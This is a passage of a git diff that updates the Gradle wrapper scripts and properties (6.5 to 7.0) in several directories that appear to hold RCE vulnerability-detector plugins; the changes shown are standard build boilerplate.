"\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202121972/gradlew.bat b/google/detectors/rce/cve202121972/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202121972/gradlew.bat +++ b/google/detectors/rce/cve202121972/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve202141773/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/cve202141773/gradlew b/google/detectors/rce/cve202141773/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202141773/gradlew +++ b/google/detectors/rce/cve202141773/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve202141773/gradlew.bat b/google/detectors/rce/cve202141773/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve202141773/gradlew.bat +++ b/google/detectors/rce/cve202141773/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve202342793/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/cve202342793/gradlew b/google/detectors/rce/cve202342793/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202342793/gradlew +++ b/google/detectors/rce/cve202342793/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} 